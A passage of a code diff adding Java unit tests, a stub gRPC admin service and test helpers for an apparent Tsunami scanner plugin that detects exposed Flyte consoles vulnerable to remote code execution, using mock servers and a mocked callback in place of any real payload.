TestHelper.createFlyteConsole(mockTargetService); + + TargetInfo target = TestHelper.buildTargetInfo(forHostname(mockTargetService.getHostName())); + mockTargetService.enqueue(new MockResponse().setResponseCode(HttpStatus.NOT_FOUND.code())); + DetectionReportList detectionReports = detector.detect(target, + ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList().isEmpty()); + RecordedRequest req = mockTargetService.takeRequest(); + assertThat(req.getPath()).contains("/console"); + + } + + /* + * console exists, but the callback URL is not called. + */ + @Test + public void detect_when_flyte_does_notReportVulnerability() throws IOException, InterruptedException, URISyntaxException { + + NetworkService service = TestHelper.createFlyteConsole(mockTargetService); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + TargetInfo target = TestHelper.buildTargetInfo(forHostname(mockTargetService.getHostName())); + mockTargetService.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(MOCK_RESPONSE_BODY)); + + //Use the mock client + detector.flyteClient = TestHelper.getMockFlyteProtoClient(); + + DetectionReportList detectionReports = detector.detect(target, + ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList().isEmpty()); + + RecordedRequest req = mockTargetService.takeRequest(); + assertThat(req.getPath()).contains("/console"); + + } + /* + * /console exists, and the RCE executed. + */ + + @Test + public void detect_when_flyte_reportVulnerability() throws IOException, InterruptedException, URISyntaxException { + + NetworkService service = TestHelper.createFlyteConsole(mockTargetService); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + TargetInfo target = TestHelper.buildTargetInfo(forHostname(mockTargetService.getHostName())); + mockTargetService.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(MOCK_RESPONSE_BODY)); + + detector.flyteClient = TestHelper.getMockFlyteProtoClient(); + + DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()) + .contains(TestHelper.buildValidDetectionReport(target, service, fakeUtcClock)); + + } + +} diff --git a/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/FlyteProtoTestService.java b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/FlyteProtoTestService.java new file mode 100644 index 000000000..337d77cf9 --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/FlyteProtoTestService.java @@ -0,0 +1,61 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import flyteidl.admin.ExecutionOuterClass; +import flyteidl.admin.ProjectOuterClass.ProjectListRequest; +import flyteidl.admin.ProjectOuterClass.ProjectRegisterRequest; +import flyteidl.admin.ProjectOuterClass.ProjectRegisterResponse; +import flyteidl.admin.ProjectOuterClass.Projects; +import flyteidl.admin.TaskOuterClass; +import flyteidl.service.AdminServiceGrpc; +import io.grpc.stub.StreamObserver; + +public class FlyteProtoTestService extends AdminServiceGrpc.AdminServiceImplBase { + + @Override + public void registerProject(ProjectRegisterRequest request, + StreamObserver responseObserver) { + + responseObserver.onNext(ProjectRegisterResponse.newBuilder().build()); + responseObserver.onCompleted(); + } + + @Override + public void listProjects(ProjectListRequest request, StreamObserver responseObserver) { + responseObserver.onNext(Projects.newBuilder().build()); + responseObserver.onCompleted(); + } + + @Override + public void createTask( + TaskOuterClass.TaskCreateRequest request, + StreamObserver responseObserver) { + responseObserver.onNext(TaskOuterClass.TaskCreateResponse.newBuilder().build()); + responseObserver.onCompleted(); + } + + @Override + public void createExecution( + ExecutionOuterClass.ExecutionCreateRequest request, + StreamObserver responseObserver) { + responseObserver.onNext(ExecutionOuterClass.ExecutionCreateResponse.newBuilder().build()); + responseObserver.onCompleted(); + } + + +} diff --git a/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/TestHelper.java b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/TestHelper.java new file mode 100644 index 000000000..d3f4fd563 --- /dev/null +++ b/community/detectors/flyte_exposed_console/src/test/java/com/google/tsunami/plugins/rce/TestHelper.java @@ -0,0 +1,169 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.rce; + +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static com.google.tsunami.plugins.rce.ExposedFlyteConsoleDetector.*; +import static org.mockito.AdditionalAnswers.delegatesTo; +import static org.mockito.Mockito.anyString; +import static org.mockito.Mockito.doNothing; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.spy; + +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import flyteidl.service.AdminServiceGrpc; +import flyteidl.service.AdminServiceGrpc.AdminServiceBlockingStub; +import io.grpc.ClientInterceptors; +import io.grpc.ManagedChannel; +import io.grpc.Metadata; +import io.grpc.Server; +import io.grpc.ServerCall; +import io.grpc.ServerCallHandler; +import io.grpc.ServerInterceptor; +import io.grpc.ServerInterceptors; +import io.grpc.ServerServiceDefinition; +import io.grpc.inprocess.InProcessChannelBuilder; +import io.grpc.inprocess.InProcessServerBuilder; +import io.grpc.testing.GrpcCleanupRule; +import java.io.IOException; +import java.net.URISyntaxException; +import java.time.Instant; +import okhttp3.mockwebserver.MockWebServer; + +final class TestHelper { + private static final GrpcCleanupRule grpcCleanup = new GrpcCleanupRule(); + private static final ServerInterceptor mockServerInterceptor = mock(ServerInterceptor.class, + delegatesTo(new ServerInterceptor() { + @Override + public ServerCall.Listener interceptCall(ServerCall call, Metadata headers, + ServerCallHandler next) { + return next.startCall(call, headers); + } + })); + + private TestHelper() { + } + + static NetworkService createFlyteConsole(MockWebServer mockService) { + return NetworkService.newBuilder() + .setNetworkEndpoint(forHostnameAndPort(mockService.getHostName(), mockService.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + } + + static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } + + static DetectionReport buildValidDetectionReport( + TargetInfo target, NetworkService service, FakeUtcClock fakeUtcClock) { + return DetectionReport.newBuilder() + .setTargetInfo(target) + .setNetworkService(service) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher(VULNERABILITY_REPORT_PUBLISHER) + .setValue(VULNERABILITY_REPORT_ID)) + .setSeverity(Severity.CRITICAL) + .setTitle(VULNERABILITY_REPORT_TITLE) + .setDescription(VULN_DESCRIPTION) + .setRecommendation(RECOMMENDATION)) + .build(); + } + + private static ManagedChannel buildChannel(String serverName) { + return InProcessChannelBuilder.forName(serverName).directExecutor().build(); + } + + private static Server buildServer(String serverName, ServerServiceDefinition stubService) { + return InProcessServerBuilder.forName(serverName) + .directExecutor() + .addService(stubService) + .build(); + } + + /** + * Creates and returns a gRPC AdminServiceBlockingStub using an in-process + * server for testing purposes. + * + * @return A configured AdminServiceBlockingStub instance for testing. + * @throws IOException If an I/O error occurs during server or channel creation. + */ + + private static AdminServiceBlockingStub getStubService() throws IOException { + + // Generate a unique server name for the in-process server. + String serverName = InProcessServerBuilder.generateName(); + + // Create an instance of the FlyteProtoTestService to be used as the gRPC + // service. + FlyteProtoTestService stubService = new FlyteProtoTestService(); + + // Intercept the service with a mock server interceptor for testing purposes. + ServerServiceDefinition interceptedService = ServerInterceptors.intercept(stubService, mockServerInterceptor); + + // Build the in-process gRPC server using the intercepted service. + Server build = TestHelper.buildServer(serverName, interceptedService); + grpcCleanup.register(build.start()); + + + + ManagedChannel channel = grpcCleanup.register(TestHelper.buildChannel(serverName)); + AdminServiceGrpc.AdminServiceBlockingStub blockingStub = AdminServiceGrpc.newBlockingStub( + ClientInterceptors.intercept(channel)); + return blockingStub; + } + + /** + * Creates a mock instance of the FlyteProtoClient with a pre-configured gRPC + * stub service. + * + * @return A mock FlyteProtoClient instance with a stub service set. + * @throws IOException If an I/O error occurs during the setup. + * @throws URISyntaxException If there is an error in the URI syntax during the + * setup. + */ + + static FlyteProtoClient getMockFlyteProtoClient() throws IOException, URISyntaxException { + + // Create a spy instance of FlyteProtoClient to enable mocking specific methods. + FlyteProtoClient client = spy(new FlyteProtoClient()); + + // Prevent the buildService method from being executed by mocking it to do + // nothing.This is done because the stub service is already being passed to the + // client. + doNothing().when(client).buildService(anyString()); + + client.setStub(TestHelper.getStubService()); + return client; + } +} \ No newline at end of file